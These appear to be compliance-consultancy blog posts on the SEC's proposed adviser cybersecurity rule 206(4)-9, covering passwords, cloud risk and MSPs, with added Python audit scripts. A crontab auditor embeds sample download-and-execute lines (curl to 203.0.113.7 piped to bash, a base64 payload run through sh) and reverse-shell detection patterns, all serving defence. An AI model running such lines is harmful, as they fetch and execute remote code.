Top 5 Things SEC Registered Firms Need to Do to Prepare for the New Cybersecurity Regulations in 206(4)-9 | MTradecraft

With the SEC's proposed cybersecurity rule for investment advisers, Advisers Act Rule 206(4)-9, expected to take effect soon, SEC-registered financial firms have a lot to consider when it comes to their cybersecurity programs.

These new regulations require them to protect customer information and data from unauthorized access or use, as well as prevent any malicious attacks on their systems. As such, many steps must be taken for these firms to ensure they remain compliant with this new regulation.

To help SEC CCOs comply with this rule, here are five key steps they (or their cyber designee) should take:

1) Enforce strong passwords – Employee passwords should meet the length requirements in NIST SP 800-63B (at least 8 characters for user-chosen passwords, with passphrases of up to at least 64 characters accepted) or the password control objectives in ISO 27001/27002. NIST no longer recommends forced complexity rules or scheduled rotation; it recommends screening new passwords against lists of common and breached passwords instead. Run that screening against existing passwords regularly as well, so that weak ones are identified and replaced before an attacker exploits them.

2) Implement user authentication – Every user should be authenticated before being granted access to any sensitive data. Multi-factor authentication is the gold standard for user authentication and should be required wherever it is supported, starting with email, remote access (VPN and remote desktop), and any system that holds client data.

3) Patch and update regularly – Outdated software is a major weak point for any organization. Make sure all software, including the firmware on firewalls and other network gear, receives security patches promptly, and prioritize internet-facing systems and vulnerabilities known to be actively exploited.

4) Monitor for suspicious activity – Watch for unusual user activity and for logins from unfamiliar IP addresses, at unusual hours, or following a burst of failed attempts. Investigate such events immediately; the earlier an intrusion is found, the less damage it does.

5) Perform regular penetration tests and vulnerability scans – Vulnerability scanning is automated and should run frequently; penetration testing is manual and adversarial and is done periodically. Both identify weaknesses in systems and networks before malicious actors can exploit them, and SEC-registered firms should conduct both on a schedule and keep the reports as evidence for examiners.
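As an added illustration of the password check in step 1 (example code written for this page, not part of the original post), the screening routine below follows NIST SP 800-63B: a length floor, acceptance of long passphrases, and a lookup against a breached-password list indexed by SHA-1 prefix. The blocklist is a small constructed sample; a real deployment loads a full breached-password corpus.

```python
"""Password screening in the style of NIST SP 800-63B.

Added example; not code from the original post. NIST 800-63B asks for a
length floor, acceptance of long passphrases, and screening against known
weak or breached passwords instead of composition rules. The blocklist
below is a constructed sample; a real deployment loads a large breached
password corpus and keeps it keyed by SHA-1 prefix as done here.
"""
import hashlib
import unicodedata

MIN_LENGTH = 8    # 800-63B minimum for user-chosen memorized secrets
MAX_LENGTH = 64   # 800-63B: at least 64 characters must be accepted

# Constructed sample of a breached/common-password list.
_BLOCKLIST_PLAINTEXT = [
    "password", "Password1", "123456789", "qwertyuiop",
    "Welcome2023!", "letmein1", "Summer2022", "trustno1",
]


def _sha1_hex(password: str) -> str:
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


# Index {5-char SHA-1 prefix: {35-char suffix, ...}}: a lookup reveals only the
# prefix, the k-anonymity pattern used by breached-password APIs.
BREACHED_INDEX: dict[str, set[str]] = {}
for _pw in _BLOCKLIST_PLAINTEXT:
    _h = _sha1_hex(_pw)
    BREACHED_INDEX.setdefault(_h[:5], set()).add(_h[5:])


def normalize(password: str) -> str:
    """Unicode-normalize so visually identical inputs compare equal."""
    return unicodedata.normalize("NFKC", password)


def is_breached(password: str, index: dict[str, set[str]] = BREACHED_INDEX) -> bool:
    """True if the password's SHA-1 hash is present in the breached index."""
    h = _sha1_hex(normalize(password))
    return h[5:] in index.get(h[:5], set())


def check_password(password: str, username: str = "") -> list[str]:
    """Return the reasons a password is rejected; an empty list means accepted."""
    pw = normalize(password)
    problems = []
    if len(pw) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    if len(pw) > MAX_LENGTH:
        problems.append(f"longer than {MAX_LENGTH} characters")
    if username and username.lower() in pw.lower():
        problems.append("contains the username")
    if is_breached(pw):
        problems.append("appears in breached/common password list")
    # No composition rules on purpose: 800-63B says length plus screening is
    # the control, and forced symbol/number rules mostly produce "Password1!".
    return problems


if __name__ == "__main__":
    for candidate in ("Welcome2023!", "abc", "correct horse battery staple"):
        print(candidate, "->", check_password(candidate) or "accepted")
```

The same `check_password` routine can be run at password-set time and, with the stored hashes exported from the directory, as the periodic sweep the step describes: only the 5-character prefix ever needs to leave the firm if a hosted breached-password service is used.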

By following these best practices, SEC-registered financial firms will be well on their way to complying with 206(4)-9 and other applicable regulations, and will better protect their client data and their business from cyber threats.

SEC Proposed Cybersecurity Rules – What They Are and What Our Clients Should be Doing Now

What new cybersecurity regulations did 2022 bring for SEC registered RIAs?

2022 was a very busy year for cybersecurity at the SEC. The Securities and Exchange Commission (SEC) released a series of proposed regulations: one set for registered investment advisers and funds (including proposed Rule 206(4)-9) and a separate set for public companies. Together they would significantly increase SEC oversight of cybersecurity matters, calling for greater transparency about how organizations run their cybersecurity policies and procedures and make decisions, as well as an oversight role for the Board over all aspects of cyber risk.

The SEC’s unveiling of these proposals indicates the heightened importance it places on cybersecurity; few other federal agencies have gone as far in requiring public corporations and their Boards to uphold specific cybersecurity standards. One significant requirement is Board oversight of the review, assessment, and adoption of cybersecurity policies and procedures. Additionally, companies must disclose any ‘material’ cyber incidents and provide follow-up information about them on an ongoing basis. Further, organizations will be expected to actively test for vulnerabilities on their networks.

The comment period for the proposed rules concluded on May 9, 2022 with a flurry of comments being submitted. Organizations and their respective boards should prepare now due to the potentially drastic changes that may come into play once they are settled upon.

Those changes are expected to take effect Q1 2023.

What crucial requirements must be met once the new regulations are officially adopted?

If the SEC adopts rules similar to their proposed form, the key obligations include the following. (Most of these items come from the public-company proposal; the adviser proposal pairs Rule 206(4)-9 with a separate requirement to report significant cybersecurity incidents confidentially to the SEC within 48 hours on proposed Form ADV-C.)

  • Report any material cybersecurity incident within four business days of determining that it is material.
  • Actively and proactively perform vulnerability scans and penetration tests on your firm’s network.
  • Report a series of previously undisclosed, individually immaterial incidents once they become material “in the aggregate” (the proposal does not say how to judge that).
  • Periodically disclose updates on previously reported incidents in SEC filings.
  • Describe the company’s cybersecurity risk management program.
  • Explain how the Board supervises and manages cyber risk for the organization.
  • Disclose the Board members’ cybersecurity expertise, if any.

What modifications are being made to the current regulations?

Companies and their senior management will be held to a much higher standard. The new regulations dictate that businesses must establish suitable cybersecurity procedures, tell shareholders about these practices in public filings, reveal how the management team oversees such programs, and report cyber incidents in a manner that gives investors sufficient information.

If you have heard me speak in the past, one topic I always touch on is just how nebulous the SEC’s cybersecurity regulations can be. Hopefully, with the new regulations, the rules will be set in stone and more transparent than ever before; though they might come with a few extra obligations. Unfortunately, existing guidelines have made it difficult for companies to comprehend cybersecurity standards properly – but these forthcoming requirements should help rectify that issue substantially.

The SEC has made it clear that they expect more detailed and comprehensive documentation of cybersecurity threats, as well as timely incident reports and proof of proactive vulnerability audits.

What should your firm be doing?

If you have never performed a cybersecurity audit, now is the time. You simply cannot put it off any longer without being in violation. The SEC assumes you are doing audits, and I assure you your clients expect you to be doing cybersecurity audits. I expect that the SEC will use the new regulations to rake noncompliant firms over the coals to make an example of them.

Because of that, companies should take proactive steps to review and revise their cybersecurity and risk management documents as soon as possible, taking into account any changes in technology infrastructure, mergers or acquisitions that may have occurred recently, an update of the threat landscape, and any lessons gleaned from security incidents. While these systems can take a while to refresh, beginning this process and producing that documentation now will ensure better protection against future threats.

To meet all the new regulations about board oversight, boards need to be fully educated and trained on their responsibilities concerning cybersecurity and risk management. To ensure that your board can effectively fulfill these duties, determine whether full or partial board decision-making will take charge of this task. Furthermore, guarantee that everyone involved has been properly briefed so they understand company policies and procedures before approving them. If you don’t have expertise on your board, you will need to hire an expert, such as MTradecraft, to fill that spot.

All companies must have an incident response plan in place. However, with the new proposed rules coming into effect shortly, we recommend you review and refresh your existing plan to ensure it is up to date. Your designated incident response team should be familiar with the reporting timeline so it can decide when to escalate a significant or material incident for senior leadership or Board approval. Without a clear escalation policy for such cases, your business could face consequences if left unprepared.

Under the SEC’s proposal, a public company has just four business days from its materiality determination to report an incident, a far tighter window than most firms’ existing incident processes assume. To ensure that your Board of Directors knows how to respond in an emergency and take the necessary actions, brief them on the organization’s incident response plan and then have them participate in simulated exercises such as a tabletop exercise.

Establish precisely what materiality means for your organization. Senior leadership and legal staff should make the final call on whether an incident is deemed to be of sufficient importance that it needs to be reported within four days. When developing both the incident response plan and normal operating environment, ensure you have procedures in place which allow for rapid escalation to senior management or the legal team who will ultimately decide if something is considered ‘material’.

The new regulations are not going to be easy.

They will significantly change your operations and drastically cut into the budget of many firms. Unfortunately, you no longer have an option. The SEC doesn’t care if you are Goldman Sachs or Jim Bob Jones, “Work-From-Home-Financial-Planner”; cybersecurity is a requirement for everyone.

The Pros and (Mostly) Cons of RIAs Moving to the Cloud

The “cloud” has revolutionized computing as we know it, giving SEC-registered financial institutions the ability to quickly deploy an online presence, to scale as demand ebbs and flows, and to support a remote workforce.

However, this convenience comes with its own set of challenges, and the race to “move to the cloud” has frequently left registered firms and their clients with an entirely new set of security challenges, data-privacy issues, and a significant regulatory compliance workload that they aren’t prepared to face. In this article, we will explore the pros and cons of moving to the cloud as an RIA.

These issues will be even more pronounced with the introduction of the SEC’s new cybersecurity regulation, 206(4)-9.

The Pros of Moving to the Cloud

There are many reasons why RIAs choose to move to the cloud. Perhaps the most appealing reason is the convenience factor. With the cloud, organizations can quickly deploy an online presence without having to invest in on-premises infrastructure. Additionally, the cloud provides organizations with the ability to scale as demand ebbs and flows. For example, during a pandemic when many employees are working remotely, a company may need to increase its cloud capacity to accommodate the influx of traffic.

Another advantage of moving to the cloud is that it can help organizations save money. With on-premises infrastructure, companies have to pay for hardware, software, maintenance, and energy costs. However, with cloud computing, these costs are often included in the monthly service fee. Additionally, because cloud providers frequently offer pay-as-you-go pricing models, companies only have to pay for the resources they use – making it a more cost-effective option in the long run.

The Cons of Moving to the Cloud

However, there are also disadvantages of moving to the cloud that financial institutions need to be aware of before making the switch. One of the biggest lies ever told is that the cloud provides security. It doesn’t. The provider secures the physical data centers and the hypervisor; everything above that (identities, network rules, storage permissions, patching of your own VMs) is your responsibility, and data stored off-site on servers managed by a third party can be compromised through any of it. Cloud compromises happen frequently, and most public cloud breaches trace back to customer-side misconfiguration rather than to the provider. Additionally, because cloud environments are complex and dynamic (multiple users reaching data from many locations), it is harder for IT teams to monitor for threats. The provider will not monitor your workloads for compromise on your behalf, and a warning from an external researcher about an exposed bucket or database may reach you late or not at all unless you have published a security contact and someone is watching that mailbox.

What problems do I find most frequently when performing security audits for clients?

Cloud marketplaces are replete with pre-built VM images for customers to use. While convenient, they frequently open the door to attack: in my audits I have found countless images with unpatched vulnerabilities or overly permissive firewall settings that make them an easy target, and some that came pre-installed with malware or cryptocurrency miners.

While these attacks are threatening, they’re only the beginning in terms of what’s possible. An attacker that is properly motivated could create a VM image that would contact the malware operators and establish a command-and-control connection after a set amount of time has passed.

Furthermore, with the rise in hybrid-cloud deployments and point-to-point VPNs connecting cloud environments to a customer’s on-premises network, a vulnerability on a cloud VM could easily become a pathway to the heart of an organization’s network.

While cloud providers do scan marketplace images for malware before allowing them to be used, those scans only detect KNOWN and UNALTERED malicious code, so they are not a complete defense. For example, a simple cron job on a Linux VM or a scheduled task on Windows could download a secondary payload days or weeks after provisioning and never be detected, because nothing malicious is present in the image at scan time.
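To make the cron-job point concrete, here is an audit script (added example, not from the original post) that parses crontab-format text from a provisioned image and flags entries that pipe remote content into an interpreter, decode embedded payloads, execute from temporary or hidden paths, run at every boot, or are pinned to a single calendar date, which is how a “wake up in three weeks” job looks. The sample crontab is constructed, and the detection patterns are this example’s own heuristics, not a vendor’s.

```python
"""Audit crontab entries on a freshly provisioned VM image for delayed
download-and-execute jobs.

Added example, not from the original post. Parses crontab-format text
(system crontab / cron.d with a user column, or a per-user crontab without
one) and flags commands that fetch and run remote content, decode embedded
payloads, or run out of world-writable/hidden paths, plus entries that run
at every boot or are pinned to one calendar date. The sample crontab below
is constructed for illustration.
"""
import re
from dataclasses import dataclass, field

# Heuristics written for this example; tune them to your own environment.
SUSPICIOUS_PATTERNS = {
    "remote fetch piped to interpreter": re.compile(
        r"\b(curl|wget)\b[^|;]*\|\s*(sudo\s+)?(ba|z|da)?sh\b"
        r"|\b(curl|wget)\b[^|;]*\|\s*(python|perl)\b"),
    "base64-decoded payload": re.compile(
        r"base64\s+(-d|--decode)|echo\s+[A-Za-z0-9+/=]{20,}\s*\|"),
    "bash /dev/tcp reverse shell": re.compile(r"/dev/tcp/"),
    "executes from tmp/hidden path": re.compile(
        r"(^|\s)(/tmp/|/dev/shm/|/var/tmp/|\S*/\.[A-Za-z0-9_-]+/)"),
}
_SPECIAL = {"@reboot", "@yearly", "@annually", "@monthly", "@weekly",
            "@daily", "@midnight", "@hourly"}


@dataclass
class Finding:
    line_no: int
    schedule: str
    command: str
    reasons: list[str] = field(default_factory=list)


def parse_entry(line: str, system_crontab: bool):
    """Return (schedule_fields, command) or None for blanks/comments/env lines."""
    s = line.strip()
    if not s or s.startswith("#"):
        return None
    if re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", s):
        return None  # environment assignment such as PATH= or MAILTO=
    parts = s.split()
    if parts[0] in _SPECIAL:
        n = 1
    else:
        if len(parts) < 6:
            return None  # malformed; cron would reject it
        n = 5
    if system_crontab:
        n += 1  # /etc/crontab and /etc/cron.d files carry a user column
    if len(parts) <= n:
        return None
    return parts[:n], " ".join(parts[n:])


def audit_crontab(text: str, system_crontab: bool = False) -> list[Finding]:
    """Return a Finding for every entry that trips at least one heuristic."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        parsed = parse_entry(line, system_crontab)
        if not parsed:
            continue
        sched, cmd = parsed
        reasons = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(cmd)]
        if sched[0] == "@reboot":
            reasons.append("runs at every boot")
        elif len(sched) >= 5 and sched[2].isdigit() and sched[3].isdigit():
            # literal day-of-month AND month: fires once a year, i.e. a delayed one-shot
            reasons.append("pinned to a single calendar date (delayed one-shot)")
        if reasons:
            findings.append(Finding(no, " ".join(sched), cmd, reasons))
    return findings


# Constructed sample /etc/crontab from a marketplace image: three normal
# distro entries followed by three that should never ship in an image.
SAMPLE_CRONTAB = """\
# /etc/crontab (constructed sample)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
0 3     * * 0   root    /usr/bin/certbot renew --quiet
@reboot         root    /usr/lib/.updater/update.sh
30 2    15 11 * root    curl -s http://203.0.113.7/u.txt | bash
*/10 *  * * *   www-data echo aGVsbG8gd29ybGQgdGhpcyBpcyBhIHRlc3Q= | base64 -d | sh
"""

if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB, system_crontab=True):
        print(f"line {f.line_no}: [{f.schedule}] {f.command}\n    -> {', '.join(f.reasons)}")
```

Run it over `/etc/crontab`, every file in `/etc/cron.d/`, and each user crontab (`crontab -l -u <user>`, parsed with `system_crontab=False`) before an image is promoted; systemd timers and `at` jobs need the same treatment and are left out here for brevity.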

Not only this, but AWS lets any account publish a public “community” AMI that other customers can launch, without the review that AWS Marketplace sellers go through. Similar to the risk of sideloaded mobile apps, using such images can have dangerous consequences for an enterprise.

Client privacy issues are a huge concern when moving to the cloud. Because data is stored off-site on servers that are managed by a third-party provider, there is always a risk that sensitive information could be accessed by unauthorized individuals. Cloud deployments are a frequent source of data leaks (S3 buckets, open databases, SQL servers ) for otherwise secure organizations.

Given that security is of utmost importance for the companies running the major clouds (Azure, AWS, Google Cloud Platform (GCP), etc.), they have implemented extremely well-developed processes to secure their hypervisor layers. However, under the shared-responsibility model that governs their infrastructure, platform and software offerings, most of the work of securing a particular environment falls on the customer’s shoulders.

Lastly, cloud providers collect broad swaths of telemetry and account data (usage statistics, contact and billing information) under terms of service that few customers read. Before moving client data, read the provider’s data-processing terms so you know how our (and our clients’) sensitive information may be used and by whom, especially when it is stored on servers we don’t control.

Although cloud networking is not automatically insecure, organizations should understand that their security strategy for the cloud needs to be as strong as an on-premises environment. With the world moving towards a remote workforce operating in a hybrid or cloud-centric environment, these companies cannot believe that added security comes along when you are working with Seattle, Redmond or Bay Area tech giants.

There are both advantages and disadvantages to moving to the cloud, which organizations should weigh carefully before making a decision. Some benefits of moving to the cloud include convenience and cost savings, while some risks include data security threats associated with storing data off-site on servers managed by a third party.

If you do decide to go to the cloud, make sure you are comparing your configuration settings against a known benchmark, such as the CIS AWS Foundations Benchmark (CIS publishes equivalent benchmarks for Azure and GCP), and repeat the comparison on a schedule, because configurations drift.
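The benchmark comparison can be automated. The script below is an added example (not from the original post and not an official CIS tool) that evaluates a snapshot of an AWS account against a handful of controls of the kind the CIS AWS Foundations Benchmark contains: root MFA and root access keys, password policy length, MFA for console users, stale access keys, a multi-region CloudTrail trail with log file validation, and S3 public access blocks. The snapshot dict is constructed and loosely mirrors the shapes of the relevant boto3 responses; collecting it from a live account is left to the reader. A hardened copy of the same snapshot is produced alongside so the weak and corrected settings can be compared.

```python
"""Offline check of an AWS account snapshot against controls of the kind
found in the CIS AWS Foundations Benchmark.

Added example; not code from the original post and not an official CIS
tool. The snapshot layout loosely follows the boto3 responses for
iam.get_account_summary, iam.get_account_password_policy, the IAM
credential report, cloudtrail.describe_trails and s3.get_public_access_block;
collecting it with boto3 is left to the reader. The account below is
constructed to show a weak configuration beside its corrected form.
"""
import copy
from datetime import datetime, timedelta, timezone

NOW = datetime(2023, 1, 15, tzinfo=timezone.utc)  # fixed clock for reproducibility
STALE_KEY_DAYS = 45
PAB_KEYS = ("BlockPublicAcls", "IgnorePublicAcls", "BlockPublicPolicy", "RestrictPublicBuckets")

# Constructed weak account: the defaults a rushed migration tends to leave behind.
WEAK_ACCOUNT = {
    "summary": {"AccountMFAEnabled": 0, "AccountAccessKeysPresent": 1},
    "password_policy": {"MinimumPasswordLength": 8},
    "credential_report": [
        {"user": "<root_account>", "password_enabled": "not_supported", "mfa_active": "false"},
        {"user": "alice", "password_enabled": "true", "mfa_active": "true",
         "access_key_1_active": "true", "access_key_1_last_used_date": "2023-01-10T12:00:00+00:00"},
        {"user": "msp-svc", "password_enabled": "true", "mfa_active": "false",
         "access_key_1_active": "true", "access_key_1_last_used_date": "2022-09-01T00:00:00+00:00"},
    ],
    "trails": [{"Name": "default", "IsMultiRegionTrail": False, "LogFileValidationEnabled": True}],
    "buckets": {
        "client-statements": dict.fromkeys(PAB_KEYS, True),
        "marketing-assets": {"BlockPublicAcls": False, "IgnorePublicAcls": False,
                             "BlockPublicPolicy": True, "RestrictPublicBuckets": False},
    },
}


def _key_age_days(row: dict, now: datetime):
    """Days since access key 1 was last used, or None if there is no active key."""
    last_used = row.get("access_key_1_last_used_date")
    if row.get("access_key_1_active") != "true" or not last_used or last_used == "N/A":
        return None
    return (now - datetime.fromisoformat(last_used)).days


def check_account(acct: dict, now: datetime = NOW) -> list[str]:
    """Return one finding per failed control; an empty list means all passed."""
    findings = []
    summary = acct["summary"]
    if not summary.get("AccountMFAEnabled"):
        findings.append("root account has no MFA device")
    if summary.get("AccountAccessKeysPresent"):
        findings.append("root account has active access keys")
    if acct.get("password_policy", {}).get("MinimumPasswordLength", 0) < 14:
        findings.append("IAM password policy minimum length is below 14")
    for row in acct["credential_report"]:
        if row["user"] == "<root_account>":
            continue  # root is covered by the account summary checks above
        if row.get("password_enabled") == "true" and row.get("mfa_active") != "true":
            findings.append(f"console user {row['user']} has no MFA")
        age = _key_age_days(row, now)
        if age is not None and age > STALE_KEY_DAYS:
            findings.append(f"access key for {row['user']} unused for {age} days")
    if not any(t.get("IsMultiRegionTrail") and t.get("LogFileValidationEnabled")
               for t in acct["trails"]):
        findings.append("no multi-region CloudTrail trail with log file validation")
    for name, pab in acct["buckets"].items():
        if not all(pab.get(k) for k in PAB_KEYS):
            findings.append(f"bucket {name} does not block all public access")
    return findings


def hardened_copy(acct: dict, now: datetime = NOW) -> dict:
    """Return the same snapshot with each weak setting corrected, for comparison."""
    fixed = copy.deepcopy(acct)
    fixed["summary"] = {"AccountMFAEnabled": 1, "AccountAccessKeysPresent": 0}
    fixed["password_policy"]["MinimumPasswordLength"] = 14
    for row in fixed["credential_report"]:
        row["mfa_active"] = "true"
        if (_key_age_days(row, now) or 0) > STALE_KEY_DAYS:
            row["access_key_1_active"] = "false"  # disable (then rotate) stale keys
    for t in fixed["trails"]:
        t["IsMultiRegionTrail"] = True
        t["LogFileValidationEnabled"] = True
    for pab in fixed["buckets"].values():
        pab.update(dict.fromkeys(PAB_KEYS, True))
    return fixed


if __name__ == "__main__":
    for f in check_account(WEAK_ACCOUNT):
        print("FAIL", f)
    print("hardened:", check_account(hardened_copy(WEAK_ACCOUNT)) or "all controls pass")
```

The `msp-svc` user in the constructed snapshot is deliberate: a service account created for a managed service provider with a password, no MFA, and a key nobody has used for months is exactly the kind of finding this comparison should surface on every run.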

Need help auditing your cloud environments? MTradecraft can help. We are not affiliated with any cloud services which allows us to act as a true consultant to our clients.

The Dangers of MSPs for SEC and FINRA Registered Firms

The Dangers of Managed IT Service Providers (MSPs) for SEC-registered Firms.

(And Knowing When to RUN away from them)

There is a conflict of interest between every MSP and their clients which makes MSPs an insider threat to every SEC or FINRA registered firm’s processes and systems. They have unrestricted access to a client’s network and systems, which gives them the ability to do serious damage if they are not properly supervised.

In this blog post, I will explore the dangers of MSPs, how to audit their work, and how to protect your firm from them. While I am not saying every MSP is like this, I will say that the vast majority I have encountered within my 200+ cyber audits are.

So what is the big problem?

The goals of the MSP and their clients never align.

In the cybersecurity world there is a very real trade-off between “security” and “convenience”: the more secure a system is, the less convenient it is to use, and vice versa.

The goal of every MSP is to deliver templated technology solutions (or a package of solutions) to as many clients as possible. The MSP is generally going to err on the side of convenience when deploying these packages because that decreases the MSPs workload both in implementation and support. When they err on the side of convenience they neglect security and leave vulnerabilities open across the client’s network.

The goal of the client (the SEC or FINRA registered firm) is security, and having the MSP provide that security is often in direct conflict with the MSP’s ability to conveniently deliver their solutions.

Thus, their goals in the service never align.

Here are some of the problems I think need to be discussed in the industry right now as the SEC continues to roll out the new cybersecurity regulations known as 206(4)-9.

To start, every firm should understand that solutions also come with problems. While hiring an MSP may help your IT department’s workload, it adds significant complexity to the Compliance department’s workload.

Here are the issues:

MSPs Have Unrestricted Access to Your Network and are frequent targets of attack:

MSPs have full access to your network and systems. This includes all of your data, applications, and devices. They can also change your system configurations. This level of access makes MSPs a prime target for cyber criminals: if an MSP employee or the MSP’s remote-management tooling is compromised, the attacker inherits full access to your network and systems and can steal sensitive data, install malicious software, or shut down your entire network. Do not assume your MSP will report such a breach to you promptly; doing so exposes the MSP to reputational risk, revenue loss, and potential litigation. Put a breach-notification obligation, with a deadline, in the contract.

MSP Employees Are Not Properly Supervised

MSP employees are not always properly supervised. This means that they may not be following proper security procedures when working on your network and systems. Additionally, MSP employees may not be properly trained in cybersecurity best practices. This could lead to them making mistakes that could put your firm at risk. For example, an MSP employee could accidentally delete critical files or fail to apply security patches in a timely manner.

How to Protect Your Firm from MSP Insider Threats

There are several steps that you can take to protect your firm from MSP insider threats:

1. Vet Your MSP: Be sure to thoroughly vet your MSP before giving them access to your network and systems. Make sure that they have a good reputation and that their employees are properly trained in cybersecurity best practices. Ask to see third-party audit reports, such as a SOC 2 Type II report. If they don’t have them, this firm is not your friend. Your MSP should already have these reports and be proud to share them with you. If they aren’t, something is very wrong and the MSP is not working in your best interest.

2. Monitor Your Network: Be sure to self-monitor your network for any suspicious activity. This includes monitoring for unauthorized changes to system configurations and unusual patterns of data usage. During an examination, the SEC will want to see where you are verifying the MSPs security duties.

3. Restrict Access: Be sure only to give MSP employees the minimum amount of access necessary to perform their job duties. Do not give them any unnecessary privileges that could potentially be abused. When they request access to a system, ask the MSP to submit the request in writing to explain why they need access to those systems. Also ask the MSP to submit reports of which employees have access to your systems and what level of access they have. This all needs to be documented for the SEC and FINRA.

4. Educate Your Employees: Be sure to educate your employees about the dangers of working with unsecured networks and systems. Make sure that they know how to spot suspicious activity and what steps to take if they believe their account has been compromised. If you have fewer than 11 employees, you can implement the FieldCraft cybersecurity awareness training program for free.

5. Implement Multi-Factor Authentication: Be sure the MSP implements multi-factor authentication for all user accounts, including the accounts used by MSP employees. This will reduce the risk of attackers gaining access to your network if an employee’s credentials are compromised. Oftentimes, MSPs do not use MFA because it adds to the time and complexity of their workload. MFA stops the large majority of attacks that rely on stolen or reused passwords. If your MSP does not implement MFA by default….RUN.

By taking these steps, you can help protect your firm from the dangers of MSP insider threats.

In conclusion, many firms think hiring an MSP solves all their IT problems. While it does solve IT problems, it adds significant work to the Compliance department and to the CISO. It is important to be aware of the dangers of MSP insider threats and take steps to protect your firm from them.

By thoroughly vetting your MSP, monitoring your network, restricting employee access, educating your employees, and implementing multi-factor authentication, you can help reduce the risk of an attack on your firm.

Of course, if you need help with any of this work, MTradecraft would love to assist.

(To be clear, we don’t sell MSP services. We just do the audits.)

Why Cybersecurity Awareness Training is Important for SEC Registered Firms

Earlier this year, the SEC proposed Rule 206(4)-9 as part of a sweeping overhaul of its cybersecurity regulations. We are moving from a period where the SEC provided cybersecurity “guidance” to a period of cybersecurity “regulation”.

One of these proposed rules would require firms to provide cybersecurity awareness training to their employees on an annual basis. Providing cybersecurity awareness training is the second most important cybersecurity tip we can offer. (Using 2FA on all accounts is the first.)

In order to understand why cybersecurity awareness training is so important, it’s first necessary to understand what cyberattacks are and how they work. A cyberattack is any type of attack that is carried out using electronic means. These attacks can take many different forms, but they all have one thing in common: they exploit vulnerabilities in order to gain access to sensitive information or systems.

The most common type of cyberattack is a phishing attack. Phishing attacks use emails or other communications that look legitimate in order to trick the recipient into giving up sensitive information, such as login credentials or financial information. Once the attacker has this information, they can use it to gain access to systems or steal money.

Another common type of attack is a malware attack.

Malware is short for malicious software, and it refers to any software that is designed to harm a computer system. Malware can be used to disable systems, delete files, run up toll charges, or even steal information. One of the most famous examples of malware is the WannaCry ransomware attack of May 2017, which infected hundreds of thousands of computers in more than 150 countries and caused billions of dollars in damage.

These are just two examples of the many different types of cyberattacks that exist. It’s important for businesses to be aware of all the different types of attacks that exist so that they can be better prepared to defend against them. This is where cybersecurity awareness training comes in.

MTradecraft provides this training to our clients through our FieldCraft platform. FieldCraft provides employees with the knowledge they need to identify and defend against common cyberattacks and tests their skills with real world simulations.

When employees are trained in cybersecurity best practices, they are better equipped to spot attacks when they occur and take steps to prevent them from happening in the first place. Cybersecurity awareness training can also help businesses create a culture of security within their organization, which can further reduce the risk of an attack occurring in the first place.

The SEC’s proposal for mandatory cybersecurity awareness training is a step in the right direction towards protecting registered firms from cyber threats. By teaching employees about common attacks and how to defend against them, firms can significantly reduce their risk of being breached. In addition, creating a culture of security within an organization can help further reduce the risk of an attack occurring in the first place. All SEC and FINRA registered firms should take this rule seriously and implement mandatory cybersecurity awareness training for their employees as soon as possible.

The U.S. Securities and Exchange Commission (SEC) announced charges against 18 individuals that used hacked brokerage accounts to trade stocks and launder money.

A few days ago, the SEC announced charges against 18 defendants in an international scheme to manipulate stocks using hacked US brokerage accounts.

In February of 2021, I hosted a webinar where we simulated a cyber attack on a hedge fund to show how hackers could potentially compromise brokerage accounts and make money in micro-caps by counter-trading the buy-orders stemming from the hacked accounts.

Below is a recording of that webinar if you are interested in understanding the mechanics of how this attack might have been conducted:

The SEC’s complaint alleges that hackers accessed at least 31 US retail brokerage accounts in late 2017 and early 2018, using them to purchase the securities of Lotus Bio-Technology Development Corp. and Good Gaming, Inc.

The illegal purchases allowed con-artists, who already had a lot of Lotus Bio-Tech and Good Gaming stock, to sell their inventory at higher than normal prices and make more than $1 million in illicit proceeds.

According to the complaint, Davies Wong of British Columbia, Canada, and Glenn B. Laken of Illinois controlled the majority of the Lotus Bio-Tech and Good Gaming stock that was sold, while Mohamed coordinated with Wong, Laken, and others to carry out the online attacks that artificially manipulated market prices. The complaint claims that Richard Tang of British Columbia, Canada, was a member of both the Lotus Bio-Tech and Good Gaming frauds.

7 Steps to Compliant and Effective SEC Cybersecurity Operations

The SEC has proposed new regulations on cybersecurity practices for registered firms, collectively known as 206(4)-9. In this blog post, we’ll outline the seven steps your firm needs to take to strengthen its cybersecurity posture and meet the expectations of regulators.

  1. Establish a Board-Level Cybersecurity Oversight Function
    The first step is to establish a board-level cybersecurity oversight function. This doesn’t mean creating a new board committee devoted solely to cybersecurity (although that’s an option). Instead, it means assigning responsibility for cybersecurity governance to an existing board committee, such as the audit committee, and ensuring that the committee receives regular updates on the state of your company’s cybersecurity program.
  2. Conduct a Risk Assessment
    Your second step is to conduct a risk assessment to identify the specific cyber risks and threats facing your company. There are many frameworks you can use for this purpose; the NIST Cybersecurity Framework is a widely recognized and widely used choice that SEC examiners are familiar with. Once you’ve identified your company’s specific risks, you can develop appropriate mitigation strategies.
  3. Develop a Cyber Incident Response Plan
    Your third step is to develop a cyber incident response plan. This should include both technical and non-technical components, and it should be regularly tested and updated. The plan should be tailored to your company’s specific risks and needs, but it should at least address communication protocols, data backup and recovery procedures, and employee training. Some firms include this as part of the firm’s overall BCP (Business Continuity Plan) while others draft a separate document to cover cyber-related incidents.
  4. Implement Access Control Measures
    Your fourth step is to implement access control measures to restrict access to sensitive information on a need-to-know basis. This includes both physical and logical access controls, such as user authentication requirements (e.g., strong passwords) and least privilege principles (e.g., granting employees access only to the information they need to do their jobs).
  5. Implement Data Loss Prevention Measures
    Your fifth step is to implement data loss prevention (DLP) measures. DLP refers to any measure taken to prevent sensitive data from leaving your company’s network without authorization. This might include encrypting data in transit, implementing comprehensive activity logging, or deploying DLP software solutions.
  6. Train Employees on Cybersecurity Procedures
    Your sixth step is training employees on security procedures, including both technical procedures (e.g., how to spot phishing emails) and non-technical procedures (e.g., what to do if they suspect they’ve been breached). Employee training should be ongoing and should account for changes in threats over time.
